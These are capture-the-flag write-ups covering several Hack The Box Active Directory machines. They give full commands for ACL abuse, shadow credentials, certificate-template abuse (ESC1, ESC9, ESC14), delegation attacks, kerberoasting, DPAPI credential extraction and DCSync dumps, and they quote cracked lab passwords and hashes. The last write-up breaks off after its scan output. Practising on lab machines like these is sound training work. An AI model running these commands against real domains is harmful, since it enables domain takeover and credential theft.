
Recon

Nmap

sudo nmap -sC -sV -sT -p- --min-rate=5000 -Pn -T5 -vvvv certified.htb

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2026-01-24 17:38:48Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-24T17:40:17+00:00; +6h59m48s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-24T17:40:17+00:00; +6h59m48s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
|_ssl-date: 2026-01-24T17:40:17+00:00; +6h59m48s from scanner time.
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49693/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49694/tcp open  msrpc         syn-ack Microsoft Windows RPC
49695/tcp open  msrpc         syn-ack Microsoft Windows RPC
49724/tcp open  msrpc         syn-ack Microsoft Windows RPC
49745/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

enum4linux-ng

Using the provided creds I start off by running an enum scan of the target:

As well as no lockout policy:

nxc

I continued my enumeration using nxc:

I quickly spidered the shares and found nothing useful:

BloodHound

After some thorough enumeration I decided to check out bloodohund:

Our user appears to have WriteOwner privs over the MANAGEMENT group, which will in turn give us access to the management_svc user.

Exploitation

WriteOwner on group

This could be simply done using bloodyAD:

bloodyAD --host 10.129.231.186 -d certified.htb -u 'judith.mader' -p 'judith09' set owner 'MANAGEMENT' 'judith.mader'

GenericWrite

Next up I had to abuse the GenericWrite privs over management_svc. In order to do this though I'd have to give myself GenericAll privs first over the MANAGEMENT group:

bloodyAD --host 10.129.231.186 -d certified.htb -u 'judith.mader' -p 'judith09' add genericAll 'MANAGEMENT' 'judith.mader'

Then add myself to the group:

Finally I was able to add shadowCredentials to the management_svc user:

GenericAll

I can now exploit the GenericAll privs over ca_operator:

I will be doing this by using the dumped NT hash:

bloodyAD --host 10.129.231.186 -d certified.htb -u 'management_svc' -p ':a091c1832bcdd4677c28b5a6a1295584' set password 'ca_operator' 'P@ssword123!'

Privilege Escalation

ADCS - ESC9

Once I took over the ca_operator user it was time to check out the certificates:

It turns out that the target is vulnerable to ESC9.

In order to exploit this we will be taking the following steps:

certipy-ad account -u 'management_svc@certified.htb' -hashes a091c1832bcdd4677c28b5a6a1295584  -dc-ip 10.129.231.186 -user 'ca_operator' -upn 'administrator' update

Next up the TGT is obtained in order to pass the kerb ticket

certipy-ad shadow -u 'management_svc@certified.htb' -hashes a091c1832bcdd4677c28b5a6a1295584 -account 'ca_operator' auto -dc-host dc01.certified.htb

We will now be requesting the certificate:

certipy-ad req -k -dc-ip 10.129.231.186 -target DC01.certified.htb -ca certified-DC01-CA -template CertifiedAuthentication

As part of the clean up we reverse the ca_operator rights:

certipy-ad account -u 'management_svc@certified.htb' -hashes a091c1832bcdd4677c28b5a6a1295584  -dc-ip 10.129.231.186 -user 'ca_operator' -upn 'ca_operator' update

Lastly we authenticate as the Administrator:

user.txt

root.txt

[^Links]: [[Hack The Box]]

HTB-Scepter

Maxim Andrei Koltypin — Sat, 24 Jan 2026 00:00:00 GMT

Scope:
10.129.244.44

Recon

Nmap

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2026-01-25 01:38:53Z)
111/tcp   open  rpcbind       syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA/domainComponent=scepter
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA/domainComponent=scepter
2049/tcp  open  nlockmgr      syn-ack 1-4 (RPC #100021)
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA/domainComponent=scepter
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA/domainComponent=scepter
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp  open  ssl/http      syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2026-01-25T01:39:56+00:00; +6h30m54s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Issuer: commonName=dc01.scepter.htb
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49673/tcp open  msrpc         syn-ack Microsoft Windows RPC
49690/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49691/tcp open  msrpc         syn-ack Microsoft Windows RPC
49695/tcp open  msrpc         syn-ack Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack Microsoft Windows RPC
49709/tcp open  msrpc         syn-ack Microsoft Windows RPC
49757/tcp open  msrpc         syn-ack Microsoft Windows RPC
49761/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Right away I noticed that an NFS port was open which is almost always low hanging fruit.

2049/TCP - NFS

In order to view the contents I had to be root:

I copy them over to my /home directory and convert the pfx files to hashes. In turn I am able to crack them using john:

I tried to export the pfx file in order to get a TGT but failed miserably:

However this did show me the naming convention of the domain -> e.lewis which meant I could now attempt a kerbrute user enumeration. For this I will be mutating a wordlist first:

sed 's/^\(.\)/\1./' /usr/share/seclists/Usernames/statistically-likely-usernames/jsmith.txt > j.smith.txt

It did get us a couple of users. I tried spraying the password and it didn't seem to work for any of the found users, however one account did seem to be restricted:

PFX certificate bundle

Since none of the above worked I returned to the baker.crt and baker.key files. Using the password phrase that we cracked, newpassword, I was able to write the RSA key.

openssl rsa -in baker.key -out decrypted.key

I then appended the certificate info into the baker.pem file:

Next up I ran the following command:

openssl pkcs12 -in baker.pem -keyex -CSP  "Microsoft Enhanced Cryptographic Provider v1.0" -export -out baker.pfx

[!important] Leave the export password blank!

Now we can auth as baker:

d.baker
18b5fb0d99e7a475316213c15b6f22ce

nxc

Now I was able to start fully enumerating the system:

Unfortunately there was nothing interesting on the shares:

BloodHound

Time for some bloodhound enumeration:

ForceChangePassword

This is easily done with bloodyAD:

bloodyAD --host 10.129.244.44 -d scepter.htb -u 'd.baker' -p ':18b5fb0d99e7a475316213c15b6f22ce' set password 'a.carter' 'P@ssword123!'

GenericAll on OU

As per the bloodhound wiki

This can be done as follows:

impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal 'a.carter' -target-dn 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' 'scepter.htb'/'a.carter':'P@ssword123!'

Exploitation

ADCS - ESC14

Continuing on I check out the certificate templates using certipy-ad:

certipy-ad find -u d.baker -hashes :18b5fb0d99e7a475316213c15b6f22ce  -dc-ip 10.129.244.44 -stdout -vulnerable

At the bottom I notice that the target is vulnerable to ESC9:

I also noticed the following:

This is an interesting find but we need to enumerate further to make this work.

altSecurityIdentities

We can search for altSecurityIdentities using the following nxc command with ldap query:

nxc ldap scepter.htb -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce --query "(&(objectCategory=person)(objectClass=user)(altSecurityIdentities=*))" ""

I see that this outputs the h.brown user who has it set. I can exploit this using bloodyAD:

bloodyAD --host 10.129.244.44 -d scepter.htb -u 'a.carter' -p 'P@ssword123!' add genericAll 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' a.carter

bloodyAD --host 10.129.244.44 -d scepter.htb -u 'a.carter' -p 'P@ssword123!' set object d.baker mail -v h.brown@scepter.htb

[!note] The LDAP query shows that h.brown has altSecurityIdentities set to an X.509 RFC822 mapping, meaning any certificate containing the email h.brown@scepter.htb can authenticate as that user without knowing their password.

Next up we can request the certificate:

certipy-ad req -username 'd.baker@scepter.htb' -hashes ':18b5fb0d99e7a475316213c15b6f22ce' -target dc01.scepter.htb -ca scepter-DC01-CA -template StaffAccessCertificate -dc-ip 10.129.244.44

We can now auth as h.brown through this cert:

certipy-ad auth -pfx d.baker.pfx -dc-ip 10.129.244.44 -domain scepter.htb -username h.brown

There's just a small problem however...

As mentioned earlier on in the writeup, this account is restricted since it is inside the Protected Users group.

Foothold

Shell as h.brown

No biggy though as we can easily login using the ccache file:

KRB5CCNAME=h.brown.ccache evil-winrm -i dc01.scepter.htb -r scepter.htb

user.txt

Privilege Escalation

ADCS - ESC14 (v2.0)

When checking the Shortest Paths to Admin query on bloodhound I noticed the following:

Turns out that the p.adams user has quite interesting privs here, let's check out the Helpdesk Enrollment Certificate template.

Looks like only users in the Admin groups can write to it, unless...

bloodyAD --host dc01.scepter.htb -d scepter.htb -k get writable --detail

Terribly convenient, let's exploit this.

Since p.adams does not have an altSecurityIdentities set we can use the one from h.brown:

bloodyAD --host dc01.scepter.htb -d scepter.htb -k set object 'p.adams' altSecurityIdentities -v 'X509:<RFC822>h.brown@scepter.htb'

Accordingly we'll set d.baker's mail again to match it:

bloodyAD --host 10.129.244.44 -d scepter.htb -u 'a.carter' -p 'P@ssword123!' set object d.baker mail -v h.brown@scepter.htb

And we can request the certificate:

certipy-ad req -username 'd.baker@scepter.htb' -hashes ':18b5fb0d99e7a475316213c15b6f22ce' -target dc01.scepter.htb -ca scepter-DC01-CA -template StaffAccessCertificate -dc-ip 10.129.244.44

This certifcate can now be used to authenticate as p.adams:

DCSync

Since we earlier found that we can DCSync we can just go ahead and run impacket-secretsdump in order to dump the ntds.dit:

The same can be achieved through nxc:

root.txt

HTB-Authority

Maxim Andrei Koltypin — Sun, 25 Jan 2026 00:00:00 GMT

Scope:
10.129.229.56

Recon

Nmap

sudo nmap -sC -sV -sT -p- -Pn -T5 --min-rate=5000 -vvvv authority.htb

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2026-01-25 19:23:21Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-25T19:24:18+00:00; +4h00m02s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Issuer: commonName=htb-AUTHORITY-CA/domainComponent=htb
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-25T19:24:18+00:00; +4h00m02s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Issuer: commonName=htb-AUTHORITY-CA/domainComponent=htb
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-25T19:24:18+00:00; +4h00m02s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Issuer: commonName=htb-AUTHORITY-CA/domainComponent=htb
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Issuer: commonName=htb-AUTHORITY-CA/domainComponent=htb
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8443/tcp open  ssl/http syn-ack Apache Tomcat (language: en)
| ssl-cert: Subject: commonName=172.16.2.118
| Issuer: commonName=172.16.2.118
|_http-title: Site doesnt have a title (text/html;charset=ISO-8859-1).
|_http-favicon: Unknown favicon MD5: F588322AAF157D82BB030AF1EFFD8CF9
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| tls-alpn: 
|_  h2
|_ssl-date: TLS randomness does not represent time
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49673/tcp open  msrpc         syn-ack Microsoft Windows RPC
49694/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49695/tcp open  msrpc         syn-ack Microsoft Windows RPC
49697/tcp open  msrpc         syn-ack Microsoft Windows RPC
49698/tcp open  msrpc         syn-ack Microsoft Windows RPC
49706/tcp open  msrpc         syn-ack Microsoft Windows RPC
49714/tcp open  msrpc         syn-ack Microsoft Windows RPC
57175/tcp open  msrpc         syn-ack Microsoft Windows RPC
64088/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 5733/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 63830/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 45641/udp): CLEAN (Failed to receive data)
|   Check 4 (port 63196/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 4h00m01s, deviation: 0s, median: 4h00m01s
| smb2-time: 
|   date: 2026-01-25T19:24:09
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Enum4linux-ng

Using a random username I enumerated the system:

Further down I found that I was able to enumerate the shares:

I am able to READ Development.

445/TCP - SMB

smbclientng

I was able to log in as a guest user.

Inside I found the following:

Scrolling down I found the following:

admin 
T0mc@tAdm1n

robot
T0mc@tR00t

Furthermore I found the following:

administrator
Welcome1

And lastly I found the pwm admin password:

root
password

8443/TCP - HTTPS

I land on the login page where I can enter the found creds.

However I get the following error:

That means this password is HIGHLY LIKELY incorrect and we'll thus need to find another one.

ansible-vault

Heading back over to smb share I find the ansible vault passwords:

In order to crack it we can use ansible-vault:

I then save these hashes and attempt to crack them:

!@#$%^&*

We can now use the ansible-vault to view the contents by decrypting the contents with the cracked password:

svc_pwm
pWm_@dm!N_!23
DevT3st@123

It seems the pwm_admin_password is the second one so let's try to log in with it.

I then proceeded to download the configuration

Which contained the configuration password hash:

I also happened to find the svc_ldap proxy user as well as the proxy password hash:

configuration editor

While I tried cracking these hashes it did not seem to work so I instead headed over to the Configuration Editor:

Next up I headed over to the following tab:

Here I modified the LDAP URLs parameter to my own:

Next up I launched responder and clicked the Test LDAP Profile button.

This gave me a cleartext credentialled output:

svc_ldap
lDaP_1n_th3_cle4r!

BloodHound

I then used this account in order to fetch bloodhound data:

I ingested it into bloodhound and checked out the results. Unfortunately the results were quite depressing, although I did have remote management access:

Foothold

Shell as svc_ldap

user.txt

I tried to enumerate the system but did not find anything of use so instead checked out the Certificate Services.

Privilege Escalation

ADCS - ESC1

Using certipy-ad I checked out the vulnerable templates.

Looks like we have enrollment rights over CorpVPN:

Furthermore we see an Enrollable Principal:

Domain Computers Enrollable

We can exploit the enrollable principal by adding a malicious machine account using powerview:

powerview authority.htb/'svc_ldap':'lDaP_1n_th3_cle4r!'@10.129.229.56

Add-ADComputer -ComputerName hacked -ComputerPass P@ssword123

I can now request the Administrator certificate:

certipy-ad req -dc-ip 10.129.229.56 -u 'hacked$' -p 'P@ssword123' -ca AUTHORITY-CA -template CorpVPN -upn Administrator

For persistence I will modify the password as well:

root.txt

At last I get access as Administrator and get the root flag.

HTB-Vintage

Maxim Andrei Koltypin — Fri, 30 Jan 2026 00:00:00 GMT

Scope:
10.129.231.205

Creds:
P.Rosa
Rosaisbest123

Recon

Nmap

sudo nmap -sC -sV -sT -p- -Pn -T5 --min-rate=5000 -vvvv vintage.htb

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2026-01-31 11:21:09Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: vintage.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: vintage.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49676/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
65015/tcp open  msrpc         syn-ack Microsoft Windows RPC
65021/tcp open  msrpc         syn-ack Microsoft Windows RPC
65041/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-01-31T11:22:00
|_  start_date: N/A
|_clock-skew: -6s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 22961/tcp): CLEAN (Timeout)
|   Check 2 (port 13217/tcp): CLEAN (Timeout)
|   Check 3 (port 17035/udp): CLEAN (Timeout)
|   Check 4 (port 56429/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Kerbrute

Mutating wordlists

By mutating a wordlist to the naming convention of the user we already found we can find another user in the domain:

awk '{print substr($0,1,1)"."substr($0,2)}' /usr/share/seclists/Usernames/statistically-likely-usernames/jsmith.txt  > j.smith.txt

kerbrute userenum -d vintage.htb --dc 10.129.231.205 j.smith.txt \
| grep -oP '\b[a-zA-Z0-9._-]+(?=@)'

We can mutate even further by using the smith.txt file, and using awk to prepend alphabetical characters:

awk '{for(c=97;c<=122;c++) printf "%c.%s\n",c,$0}' /usr/share/seclists/Usernames/statistically-likely-usernames/smith.txt > mutated.txt

This gives us 2 more users which we can add.

BloodHound

First I went ahead and requested a TGT for the P.Rosa user.

Then I went ahead and created a new krb5 config file:

Using nxc I was able to enumerate all present users:

I then went ahead and enumerated the target using bloodhound:

Inspecting the shortest path I noticed that our user didn't really hold any special privileges:

From the bloodhound-ce-python output however I remember the following line:

I thus checked out this computer in bloodhound:

Outbound Object Control:

This is quite interesting as we are able to dump the gMSA password for the GMSA01$ account, but even more so interesting is what groups this computer is a member of:

Being a member of the Pre-Windows 2000 Compatible Access group as a computer means the password is HIGHLY LIKELY the same as the computer name, as per this article:

FS01$
fs01

Since non-kerb authentication does not work in this domain I requested a TGT for this computer account:

gMSA dump

Now we can go ahead as we previously found:

gMSA01$
d933ef50c2677cc83e8c9a7d09e678e5

GenericWrite - Add to group

Now since we own the gMSA01$ machine account we can check our privs, which turn out to be plentiful.

First of all I request a TGT again:

Now we can use bloodyAD to add ourselves to the group:

bloodyAD --host DC01.vintage.htb -d vintage.htb -k add groupMember 'SERVICEMANAGERS' 'gMSA01$'

GenericAll

We now appear to have GenericAll privileges over 3 service accounts. One of the accounts, namely svc_sql, appears to be disabled.

Since we have GenericAll over the account we can enable the account again.

[!warning] We will have to request a new TGT otherwise we'll get the following error:

bloodyAD -d vintage.htb -k --host "dc01.vintage.htb" remove uac svc_sql -f ACCOUNTDISABLE

Now that the account is enabled again we can kerberoast all the accounts.

targetedKerberoast -v -d 'vintage.htb' -k --no-pass --dc-host dc01.vintage.htb

john

I was then able to crack one of the hashes:

svc_sql
Zer0the0ne

Looks like the password is reused by C.Neri.

It appears C.Neri has remote management access, meaning we should be able to winrm into the system.

Foothold

Shell as C.Neri

user.txt

Decrypting DPAPI hash

Eventhough we can't use cmdkey /list, we can check the local credentials:

Now I tried to use the following script to extract the credentials, however it got flagged by AV:

Instead I'll have to do it the hard way:

I tried downloading them using the C2, that did not work. I then tested smbserver which didn't work either, so instead I converted the contents to base64:

[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847'))

[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b'))

I then copied the contents over, base64 decoded it and placed them in their respective file names:

echo "<BASE64 ENCODED>" | base64 -d > 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
echo "<BASE64 ENCODED>" | base64 -d > 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b

I then did the same as above for the masterkey:

[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\users\c.neri\appdata\roaming\microsoft\credentials\C4BB96844A5C9DD45D5B6A9859252BA6'))

echo "<BASE64 ENCODED>" | base64 -d > C4BB96844A5C9DD45D5B6A9859252BA6

Now I was able to decrypt the dpapi hash and get the password.

c.neri_adm
Uncr4ck4bl3P4ssW0rd0312

Now this got way more interesting:

Privilege Escalation

Resource Based Constraint Delegation (RBCD)

It appears I'm already part of the Delegatedadmins group, and I can abuse the AllowedToAct attribute.

In order to succeed though we'll need to add the FS01$ machine account to the Delegatedadmins group using our GenericWrite privileges and request a new ticket on their behalf.

Next up we'll request the ST to impersonate DC01$ with:

impacket-getST -spn 'cifs/DC01.vintage.htb' -impersonate 'DC01$' 'vintage.htb'/'FS01$' -dc-ip DC01.vintage.htb -k -no-pass

DCSync

Now that we have a valid ticket as the DC01$ machine account we can DCSync the domain and dump the ntds.dit:

nxc smb 10.129.7.79 -k --use-kcache --ntds

While it is not possible to use the Administrator account to log in, we can use L.Bianchi_adm to get an administrative shell.

HTB-Facts

Maxim Andrei Koltypin — Sun, 01 Feb 2026 00:00:00 GMT

import PasswordProtect from "~/components/PasswordProtect.client";

Scope:
10.129.20.26

Recon

Nmap

sudo nmap -sC -sV -sT -p- -Pn -T5 --min-rate=5000 -vvvv facts.htb

PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNYjzL0v+zbXt5Zvuhd63ZMVGK/8TRBsYpIitcmtFPexgvOxbFiv6VCm9ZzRBGKf0uoNaj69WYzveCNEWxdQUww=
|   256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPCNb2NXAGnDBofpLTCGLMyF/N6Xe5LIri/onyTBifIK
80/tcp    open  http    syn-ack nginx 1.26.3 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 8C83ADFFE48BE12C38E7DBCC2D0524BC
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.26.3 (Ubuntu)
|_http-title: facts
54321/tcp open  http    syn-ack Golang net/http server
|_http-server-header: MinIO
| http-methods: 
|_  Supported Methods: GET OPTIONS
|_http-title: Did not follow redirect to http://facts.htb:9001
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 303
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 188FE85264FAB013
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Sat, 31 Jan 2026 19:43:39 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>188FE85264FAB013</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
